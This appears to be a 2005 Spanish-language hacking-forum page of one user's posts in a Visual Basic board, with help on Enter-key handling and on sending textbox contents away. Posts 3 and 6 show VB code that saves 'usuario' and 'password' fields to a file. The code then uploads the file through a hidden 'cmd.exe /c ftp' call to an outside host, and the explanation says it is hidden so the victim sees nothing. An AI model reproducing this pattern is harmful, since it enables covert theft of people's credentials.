elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Mensajes
Páginas: [1]
1  Programación / Programación Visual Basic / Re: setfocus y tabindex ??? en: 18 Octubre 2005, 22:43 pm
Exacto.

Podes realizar cualkier accion, como x ejemplo:
Código:
Private Sub Text1_KeyPress(KeyAscii As Integer)
    If KeyAscii = 13 Then 'el 13 es el codigo ascii del Enter
        SendKeys "{Tab}"
    End If
End Sub

eso seria para simular la tecla TAB y que cambie al siguiente objeto...

salu2 !
gracias man me ayudo mucho  ;D
2  Programación / Programación Visual Basic / Re: mandar txt a email en: 18 Octubre 2005, 22:37 pm
Prueba utilizando PUT en vez de WRITE.
man podriasponer como quedaria dicesq le agerege tu codigo o lo ponga  aparte ???
3  Programación / Programación Visual Basic / Re: mandar txt a email en: 17 Octubre 2005, 00:08 am
Código:
shell "cmd.exe /c ftp -s:C:\datos.txt ftp.hosting.com",vbhide

shell » Ejecuta...
cmd.exe » La aplicación command.exe
/c » Con la siguiente serie de comandos...
ftp » Inicia el servicio FTP.
-s:C:\datos.txt » Llama a dicho archivo para que ejecute todas las líneas que contengan.
ftp.hosting.com » Servidor con el que se realizará los servicios.
vbhide » Ejecuta la ventana del msdos en modo oculto para que la victima no vea nada...

hola amigo hoy quize probarlo y nada no puede  :(
por q cual fue mi ??? error en q me qquivoque hize de todas las formas y nada  ???
mi nombre usuario pasword lo demas normal y nada
por fa ayudenme mi trabajo esta a un asi

Open "c:\dario.txt" For Append As #1
        Write #1, Text1.Text
        Write #1, Text2.Text
    Close #1
ademas unos de mis  intentos borro el contenido del text1 y text2 y me salio con suario paswords byess escritos ??? sera por q en tu ejm esta en output por fa espero q me ayudes  ???
4  Programación / Programación Visual Basic / Re: setfocus y tabindex ??? en: 15 Octubre 2005, 22:55 pm
Código:
Private Sub Text1_KeyPress(KeyAscii As Integer)
    If KeyAscii = 13 Then 'el 13 es el codigo ascii del Enter
        Command1_Click 'aca que keres q pase si se aprieta enter
    End If
End Sub

;)
disculpa q te moleste al preguntarte pero no teng el compilador ahora para probarlo pero con este cdigo hago q con apretarenter haga como si fuera q esoty haciendo click en commandbutton ???
5  Programación / Programación Visual Basic / Re: setfocus y tabindex ??? en: 15 Octubre 2005, 18:50 pm
hola he leido este tema y es justo lo q me interesa se un poc sobre este tema y no se si me pueden ayudar solucionarlo bueno quisiera hacer q igual q tabindex hace pasar un objeto a otro con la tecla tab  .
como puedo hacer q con hacer enter haga como si apretara un commandbutton un ejm de lo quiero hacer es algo teng 2 texbox y commandbutton y lo quiero quiero es cuando el foco este en textbox si yo apreto enter de frente haga como si apretara el commandbutton  espero q me entienda y me ayuden  ;D gracias
6  Programación / Programación Visual Basic / Re: mandar txt a email en: 15 Octubre 2005, 18:43 pm
MANDAR EMAIL POR SMTP[/b]

[quote ]
] el codigo es muy largo lo que quierop es envar 2 textbox o el archivo de texto a un email

Modificalo y usa solo la parte que necesites
Citar
no puedo por q no se cual es el codigo q necesito y digo q es muy largo y no lo entiendo , espero q si puedes lo pongas aunque yeikos pueso algo muy bueno quisiera para mandarlo a un mail espero q si sabes me puedas ayudar  :).

Citar
Open "C:\datos.txt" for output as #1
write #1, "usuario"
write #1, "password"
write #1, "put C:\datos.txt datos.txt"
write #1, "bye"
close #1

shell "cmd.exe /c ftp -s:C:\datos.txt ftp.hosting.com",vbhide


Sería una cosa así, corrijanme si hay algún fallo, lo que hace es conectarse a ftp.hosting, logearse como usuario y con la contraseña 'password', subir el fichero datos.txt al ftp y cerrar la sesión
gracias yeikos por tu ayuda ahora podre mandar el txt  lo has explicado muy bien q la unica duda es este codigo :

shell "cmd.exe /c ftp -s:C:\datos.txt ftp.hosting.com",vbhide

por fa podrias explicarme esto para q sirve y q hace , muchas gracias

pd: existe la forma de enviarmelo a un mail es q quiero hacer un programa donde el contenido del texbox se guarde en un txt y mandarlo a su mail espero q me puedan ayudar  :)
7  Programación / Programación Visual Basic / mandar txt a email en: 14 Octubre 2005, 21:26 pm
hola q tal esoty haciendo un programa y bueno todo el contenido de un texbox lo guardo en archivo de texto pero no se como mandar a un email , podrian ayudarme a desarrollar este pequeño programa he buscado en este foro  y en google pero el codigo es muy largo lo que quierop es envar 2 textbox o el archivo de texto a un email espero q me ayuden a desarrollar este programa  ;D
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines